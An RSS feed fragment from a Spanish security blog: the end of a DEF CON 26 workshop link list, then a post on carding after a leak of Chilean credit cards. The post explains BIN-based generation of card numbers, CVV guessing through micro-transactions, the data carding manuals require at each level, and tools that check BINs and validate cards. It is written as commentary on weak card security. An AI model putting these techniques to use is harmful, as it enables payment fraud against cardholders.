&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Joe-Grand-Build-Your-Own-Opticspy.pdf"&gt;Workshop-Joe-Grand-Build-Your-Own-Opticspy.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Joe-Grand-Hardware-Hacking-Basics.pdf"&gt;Workshop-Joe-Grand-Hardware-Hacking-Basics.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Joshua-Pereyda-and-Timothy-Clemans-Advanced-Custom-Network-Protocol-Fuzzing.pdf"&gt;Workshop-Joshua-Pereyda-and-Timothy-Clemans-Advanced-Custom-Network-Protocol-Fuzzing.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Louis-Nyfenegger-and-Luke-Jahnke-Finding-Needles-in-Haystacks.pdf"&gt;Workshop-Louis-Nyfenegger-and-Luke-Jahnke-Finding-Needles-in-Haystacks.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Louis-Nyfenegger-and-Luke-Jahnke-JWAT-Attacking-JSON-WEB-TOKENS.pdf"&gt;Workshop-Louis-Nyfenegger-and-Luke-Jahnke-JWAT-Attacking-JSON-WEB-TOKENS.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Matt-Cheung-Introduction-to-Cryptographic-Attacks.pdf"&gt;Workshop-Matt-Cheung-Introduction-to-Cryptographic-Attacks.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Mike-Guirao-Securing-Big-Data-in-Hadoop.pdf"&gt;Workshop-Mike-Guirao-Securing-Big-Data-in-Hadoop.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Nick-Tait-Reverse-Engineering-with-OpenSCAD-and-3D-Printing.pdf"&gt;Workshop-Nick-Tait-Reverse-Engineering-with-OpenSCAD-and-3D-Printing.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Sneha-Rajguru-ARM-eXploitation-101.pdf"&gt;Workshop-Sneha-Rajguru-ARM-eXploitation-101.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Walter-Cuestas-and-Mauricio-Velazco-Lateral-Movement-101-2018-Update.pdf"&gt;Workshop-Walter-Cuestas-and-Mauricio-Velazco-Lateral-Movement-101-2018-Update.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Fuente:&lt;/b&gt; &lt;a href="https://www.cyberhades.com/2018/08/13/material-defcon-26/" target="_blank"&gt;https://www.cyberhades.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_P01B5vIJwK5gpolgAW8oZntWueB2InFPo70q174vgeASdhSS_XTgGcC-DpUh5wEg76YrhkOtowe7LuBKcqFdPA0LDcrdYhKXzdQGklawmLpY11mK9PvPUN3wUVORMQ4YChuuEaExoiWs/s72-c/def+con+26.png" width="72"/></item><item><title>Hackeando un Banco 3 ["Hackear" 14.000+ Tarjetas de Crédito (Carding)]</title><link>http://www.blackploit.com/2018/07/hackeando-un-banco-3-hackear-14000.html</link><category>Blackploit</category><category>Carding</category><category>Hacking</category><category>Noticias</category><category>Seguridad</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Thu, 26 Jul 2018 16:26:00 -0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-3225697531783367401</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhtNSadSnCRm-jKfqIo55Doon20e0SAZDYMWJ39c0ySDFvsj6WymSihI-FBkHfgMr9raTgCfALe_3DkO16RmtVjkBCJb3aCzoUmMi-KZktF1fBlYDLocFUqSUytyFX00izu43kEZQTOHkH/s1600/title_cc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="384" data-original-width="726" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhtNSadSnCRm-jKfqIo55Doon20e0SAZDYMWJ39c0ySDFvsj6WymSihI-FBkHfgMr9raTgCfALe_3DkO16RmtVjkBCJb3aCzoUmMi-KZktF1fBlYDLocFUqSUytyFX00izu43kEZQTOHkH/s640/title_cc.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Recientemente en la prensa chilena ha causado bastante estragos diferentes noticias relacionadas con la mala seguridad informática con la que cuentan los bancos en Chile [&lt;a href="https://www.blackploit.com/2018/04/hackeando-un-banco-2-caso-real.html" target="_blank"&gt;1&lt;/a&gt;] [&lt;a href="http://www.emol.com/noticias/Economia/2018/06/09/909234/Banco-de-Chile-confirma-que-ataque-informatico-de-mayo-robo-US-10-millones.html" target="_blank"&gt;2&lt;/a&gt;] [&lt;a href="https://www.biobiochile.cl/especial/noticias/reportajes/reportajes-reportajes/2018/07/18/hackeo-interno-en-el-banco-de-chile-informatico-robo-475-millones-de-pesos-usando-su-pc.shtml" target="_blank"&gt;3&lt;/a&gt;], ayer una filtración de más de 14 mil tarjetas de crédito de bancos chilenos provocaban el pánico de muchos, incluso de las autoridades (senador) [&lt;a href="https://twitter.com/felipeharboe/status/1022290787655213056" target="_blank"&gt;4&lt;/a&gt;]. Obligando a los bancos a dar explicaciones y bloquear las cuentas afectadas por esta filtración [&lt;a href="https://www.fayerwayer.com/2018/07/lista-bancos-hackeo-filtracion-tarjetas-credito/" target="_blank"&gt;5&lt;/a&gt;], para disminuir el impacto en la opinión pública.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Y la verdad, es que no hay que entrar en pánico ya que esta situación es más normal de lo que creen y no solo en Chile, si no, en el mundo entero...&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Qué es el &lt;i&gt;carding&lt;/i&gt;?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;i&gt;Carding&lt;/i&gt; es un término que describe el tráfico de tarjetas de crédito, cuentas bancarias y otra información personal en línea, así como los servicios relacionados con el fraude. Las actividades también abarcan la adquisición de detalles personales, y técnicas de lavado de dinero [&lt;a href="https://en.wikipedia.org/wiki/Carding_(fraud)" target="_blank"&gt;6&lt;/a&gt;].&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hay una gran cantidad de métodos para adquirir tarjetas de crédito, datos financieros y personales. La forma más común de obtenerlos es generando número de tarjetas de créditos válidas de forma semiautomática a partir de secuencias conocidas a través de un "BIN attack"[&lt;a href="https://www.syswaregroup.com/resource-centre/case-studies/banking/credit-card-fraud/" target="_blank"&gt;7&lt;/a&gt;].&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Los métodos de seguridad de las tarjetas de créditos son 2:&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;CVV:&lt;/b&gt; código numérico de largo 3. Mil combinaciones posibles, del 000 al 999 secuencialmente.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Fecha de expiración: &lt;/b&gt;mes y año. Los meses son 12. Los años son máximo 10.&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Sabiendo un número de &lt;b&gt;tarjeta de crédito&lt;/b&gt;, el &lt;b&gt;CVV&lt;/b&gt; y la &lt;b&gt;fecha de expiración&lt;/b&gt;, se pueden hacer compras online sin problemas (por montos menores al cupo de la tarjeta).&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;BIN attack&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;&lt;i&gt;&lt;b&gt;BIN&lt;/b&gt;&lt;/i&gt; se le llama a los &lt;b&gt;6 primeros dígitos de una tarjeta de crédito&lt;/b&gt;, estos 6 primero dígitos definen el país y la entidad bancaria a la que pertenece esta tarjeta de crédito.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El formato de un número de tarjeta de crédito es:&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;4444 5555 6666 7777&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Siendo &lt;b&gt;444455&lt;/b&gt; el &lt;b&gt;BIN&lt;/b&gt; de la tarjeta. Y &lt;b&gt;5566667777&lt;/b&gt; el &lt;b&gt;número que identifica al usuario&lt;/b&gt; al que pertenece la tarjeta.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Como podemos ver, cada entidad bancaria en el mundo puede emitir un máximo de 10 mil millones de tarjetas de crédito partiendo de la tarjeta 4444 5500 0000 0000 a la 4444 5599 9999 9999 secuencialmente. Bastante ¿no?.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Lamentablemente la asignación de números de tarjetas de créditos muchas veces responden a patrones, por tanto, es muy fácil generar&amp;nbsp; número de tarjeta de créditos válidas, por ejemplo, si tengo una tarjeta que sé que es válida puedo generar secuencialmente otras válidas (más adelante se hace un mejor análisis).&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;4444 55111111 1111 [válida] -&amp;gt; 4444 55111111 1112 [válida también]&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Por otro lado, existen bases de datos con BINs y su respectiva entidad bancaria, que se venden o son abiertos [&lt;a href="https://www.bindb.com/bin-list.html" target="_blank"&gt;8&lt;/a&gt;].&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Mundo carding&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Siempre que hablemos de dinero fácil, existirá una comunidad enorme que participe de ese ecosistema, en el caso del carding, su comunidad es muy grande donde participan millones de personas que compran y venden datos bancarios o de tarjetas de crédito para obtener productos o servicios a costo 0.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Aquí vemos algunos ejemplos que se encuentran fácil y abiertamente:&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioJ3ue-QY8EhdgHZhnoKtqT06mnPms5axbWNdXmteP1Ly0uj4AEN2WlL72ZDzawhLorzYUXZr2nYVn7daayq84NCYtfjTSot9U_seri55trLPzb0PJNxRoxcZtIW3cVwxEnhPjJSSDOacq/s1600/forum_carding_01.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="672" data-original-width="1442" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioJ3ue-QY8EhdgHZhnoKtqT06mnPms5axbWNdXmteP1Ly0uj4AEN2WlL72ZDzawhLorzYUXZr2nYVn7daayq84NCYtfjTSot9U_seri55trLPzb0PJNxRoxcZtIW3cVwxEnhPjJSSDOacq/s640/forum_carding_01.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Foro para compartir (vender) número de tarjetas de crédito, técnicas de compra y lavado de dinero.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAMRwMndjzmd87kqnzJdyAFN9Gi6C-wfGQwYBN274uRa5_ytMZ3UslktT-g021SAaFqrCln9vAZb9tK8SPrkSxJm-N4zzFckrB-GbMZ7-acP9L51dc7OvZJhxSl30Jnj2UKHutCkEvwsm5/s1600/web_carding_01.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="710" data-original-width="1488" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAMRwMndjzmd87kqnzJdyAFN9Gi6C-wfGQwYBN274uRa5_ytMZ3UslktT-g021SAaFqrCln9vAZb9tK8SPrkSxJm-N4zzFckrB-GbMZ7-acP9L51dc7OvZJhxSl30Jnj2UKHutCkEvwsm5/s640/web_carding_01.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Web de venta de TC y Dumps&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRI1nEKbApTlgMU9_azQUw9xKgKdTgYRWi9ncQWaeozsnfsuMUfhiGahjEZrM0EeHoWluqtGw647VRrWQkhBL4SPg-wc2PJqoGBG88XVJgCUlNJMb9MOCi0IpgPDNe_VKQHwiFb_YHxjxu/s1600/web_carding_02.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="708" data-original-width="1258" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRI1nEKbApTlgMU9_azQUw9xKgKdTgYRWi9ncQWaeozsnfsuMUfhiGahjEZrM0EeHoWluqtGw647VRrWQkhBL4SPg-wc2PJqoGBG88XVJgCUlNJMb9MOCi0IpgPDNe_VKQHwiFb_YHxjxu/s640/web_carding_02.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Web de venta de TC&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
La impunidad a este tipo de delitos es tan grande que las webs de venta son completamente abiertas (no están en &lt;b&gt;TOR&lt;/b&gt; o la &lt;b&gt;Deep Web&lt;/b&gt;) y promocionan sus servicios en varias partes.&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Literatura carding&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Así como los métodos de seguridad de las tarjetas de créditos son insuficientes, existe gran cantidad de literatura donde se enseña a generar números de tarjetas de créditos, técnicas de ingeniería social para obtener datos, técnicas de lavado de dinero, técnicas para obtener el CVV de una tarjeta, etc.&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTR8uO5WuMA0Kl8Q52-EULGdxeOKnDJhhdCfX-F1xxUcTY9laqdaMHBMkzrHUEaaFsou5sP1-nfniHw7Q7ApOaDh6cKR13dXd09M-zUNgfhHgztG3UCbuvekp-5QT-9vF-zOMFk2ogYLJC/s1600/manuales_carding.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="796" data-original-width="1600" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTR8uO5WuMA0Kl8Q52-EULGdxeOKnDJhhdCfX-F1xxUcTY9laqdaMHBMkzrHUEaaFsou5sP1-nfniHw7Q7ApOaDh6cKR13dXd09M-zUNgfhHgztG3UCbuvekp-5QT-9vF-zOMFk2ogYLJC/s640/manuales_carding.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Manuales carding&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Esta misma literatura clasifica a las tarjetas de crédito en 3 niveles, según dificultad:&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Level 1 (&lt;i&gt;Easy carding&lt;/i&gt;)&lt;/b&gt;: Se puede gastar un máximo de 50 dólares. Se necesita:&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;Tarjeta de crédito.&lt;/li&gt;
&lt;li&gt;Fecha de expiración.&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;&lt;b&gt;Level 2 (Intermediate carding)&lt;/b&gt;: Se puede gastar un máximo de 2000 dólares. Se necesita:&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;Tarjeta de crédito&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Fecha de expiración&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Código CVV, &amp;nbsp;&lt;/li&gt;
&lt;li&gt;Nombre del cliente&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Número de la cuenta bancaria.&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;&lt;b&gt;Level 3 (&lt;/b&gt;&lt;b&gt;Hard carding)&lt;/b&gt;: No hay limites establecidos de gasto. Se necesita:&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;Tarjeta de crédito&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Fecha de expiración&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Código CVV,&amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Nombre del propietario. &lt;/li&gt;
&lt;li&gt;Número de la cuenta bancaria.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Cantidad de dinero en la cuenta.&lt;/li&gt;
&lt;li&gt;Número de teléfono.&lt;/li&gt;
&lt;li&gt;SSN.&lt;/li&gt;
&lt;li&gt;DOB.&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Como podemos ver, el nivel 1 no se requiere de mucha información, simplemente el número de la tarjeta de crédito, el año y mes de expiración, realmente &lt;i&gt;easy&lt;/i&gt;.&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Herramientas carding&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Esta comunidad del delito no solo tiene lugares de comunicación y literatura extensa, también tienen un sin fin de herramientas que sirven para diferentes finalidades, a continuación les mostraré dos herramientas, la primera sirve para que con un &lt;i&gt;dump&lt;/i&gt; (llamado así a una base de datos con tarjetas de crédito, CVV y fecha de expiración pero sin validar), puedo verificar el banco, país y tipo de cuenta y la segunda herramienta sirve para validar los datos de una tarjeta de crédito.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
A la herramienta a continuación se le tienen que ingresar los 6 primeros dígitos de las tarjetas de crédito, y está te dirá de que banco y que tipo de cuenta le corresponde:&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_HS1Qf6NxyX9nryKWAZGUiRxRSNu5M_yXyt9X_nwkYwji2f-s9ISAZXaTeowU0dIaujyLobiB5noKLhP7f1xVN_1Cy_E5QhgVfZosMLz4-tbrCQ60tRPMky6z1UtkbryOoL4UvgH7V8w7/s1600/title_carding.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="377" data-original-width="1082" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_HS1Qf6NxyX9nryKWAZGUiRxRSNu5M_yXyt9X_nwkYwji2f-s9ISAZXaTeowU0dIaujyLobiB5noKLhP7f1xVN_1Cy_E5QhgVfZosMLz4-tbrCQ60tRPMky6z1UtkbryOoL4UvgH7V8w7/s640/title_carding.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Se ingresan los BINS:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiveVg2PpUYp-1svICotswQldYHVpCuYk6gnvZ432Ih2UQICZ16Rh-9I2Vn7gi8lcZnz_EVhdYjKls8x8ptx06BHaZk5lfGwBRHGuaAGfKKE0VL4SuBVKK5e3di_Ju-AzaKA_nT9-raATCF/s1600/verify_02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="222" data-original-width="687" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiveVg2PpUYp-1svICotswQldYHVpCuYk6gnvZ432Ih2UQICZ16Rh-9I2Vn7gi8lcZnz_EVhdYjKls8x8ptx06BHaZk5lfGwBRHGuaAGfKKE0VL4SuBVKK5e3di_Ju-AzaKA_nT9-raATCF/s640/verify_02.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Y se obtienen los resultados:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7dshcW23Oytjb5I_eh3XKThFN-puIxnAgiVkyo5ooBJHdy2AKjho2Krfm95JLn6zZoxZbHebWEUM_vT_i-v3FgVyW2ZENvt1mJk93mj14MJB2NqERT6UGXHoS8xek8qOtw6F80OEI-yFT/s1600/verify_03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="497" data-original-width="732" height="434" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7dshcW23Oytjb5I_eh3XKThFN-puIxnAgiVkyo5ooBJHdy2AKjho2Krfm95JLn6zZoxZbHebWEUM_vT_i-v3FgVyW2ZENvt1mJk93mj14MJB2NqERT6UGXHoS8xek8qOtw6F80OEI-yFT/s640/verify_03.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
La segunda herramienta es muy sencilla y sirve para poder verificar el CVV y fecha de expiración de una tarjeta de crédito, realizando una micro transacción:&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI4mgEWQX1UKjiO-MWijQB4T-tfkcunKfMrt4DJXC_CZuRKhwJc66QI3lyNyh9dzdfYQQ4P8y6jRn7OPLWC820mBgCdQl1q9U5pbjoO_y81B0Mm_6bDxNps2_oE4rbkgoLYRZSljy4J954/s1600/cc_checker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="439" data-original-width="683" height="410" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI4mgEWQX1UKjiO-MWijQB4T-tfkcunKfMrt4DJXC_CZuRKhwJc66QI3lyNyh9dzdfYQQ4P8y6jRn7OPLWC820mBgCdQl1q9U5pbjoO_y81B0Mm_6bDxNps2_oE4rbkgoLYRZSljy4J954/s640/cc_checker.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Ataque distribuido para adivinar CVV &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Como dijimos anteriormente el CVV viene a ser el código de (in)seguridad de las tarjetas de crédito. Un número de largo 3, con mil combinaciones posibles, muy difícil de adivinar...&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Pues bueno, ya se venden herramientas y servicios que consultan en mil comercios digitales los mil CVV posibles de una tarjeta de crédito, haciendo una micro compra, por lo general de menos de un dólar que cuando es aceptado significa que el CVV es correcto.&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;No eres tú, es tu tarjeta de crédito&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Cuando se crearon las tarjetas de crédito, se diseñaron para que la gente gastara su dinero rápidamente y no tuviera problemas ni burocracias, en esa misma linea, la seguridad significaba burocracias, agregar contraseñas seguras significaba valiosos segundos que perdía el sistema bancario, o la gente podía olvidarlas fácilmente, por lo cual se decidió por el mínimo de seguridad posible, &lt;b&gt;SIN SEGURIDAD&lt;/b&gt;.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Si tienes físicamente la tarjeta de crédito, no necesitas ni el CVV, ni la fecha de expiración, simplemente compras y ya. Y si compras a través de Internet montos menores a 50 dólares, vas a necesitar una fecha de expiración y a veces el CVV. Esos métodos de seguridad son irrisorios y como dije anteriormente, se diseñaron para que la gente gastara y no para que la gente guardara su dinero.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Por qué nadie hace nada?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Hace muchos años &lt;b&gt;VISA&lt;/b&gt; y &lt;b&gt;MasterCard&lt;/b&gt; están trabajando en mejorar la seguridad, pero no lo han logrado, ya que cualquier sistema de seguridad haría que las personas comprasen menos; poner una contraseña o verificación en dos pasos significaría agregar una barrera a la compra. Por eso es que han puesto todas sus fichas a la tecnología &lt;i&gt;contactless&lt;/i&gt;. Si antes era inseguro que te robaran la tarjeta de crédito, ahora simplemente tienen que estar cerca tuyo para cobrarte una transacción.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;El seguro paga y el banco hace vista gorda&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Como vimos, la seguridad de las tarjetas es pésima, y es muy normal que clientes del banco llamen para hacer notar que hay cobros irregulares en sus tarjetas de crédito. En la mayoría de los casos tu banco rápidamente te devuelve el dinero y te dice que fue un error, pero lo que realmente sucede es que un delincuente informático obtuvo el número de tu tarjeta de crédito o lo generó y realizó una compra fraudulenta en un país cercano a Rusia, el ejecutivo de cuenta se percata que evidentemente es un robo y lo notifica al sistema de riesgo, donde lo notifican como robo para que el seguro pague, luego te mandan un mail pidiendo disculpas, un mes después te llega una nueva tarjeta de crédito por correo o te anuncian que por ser buen cliente puedes tener una tarjeta más linda que puedes pasar a buscar.&lt;br /&gt;
&lt;br /&gt;
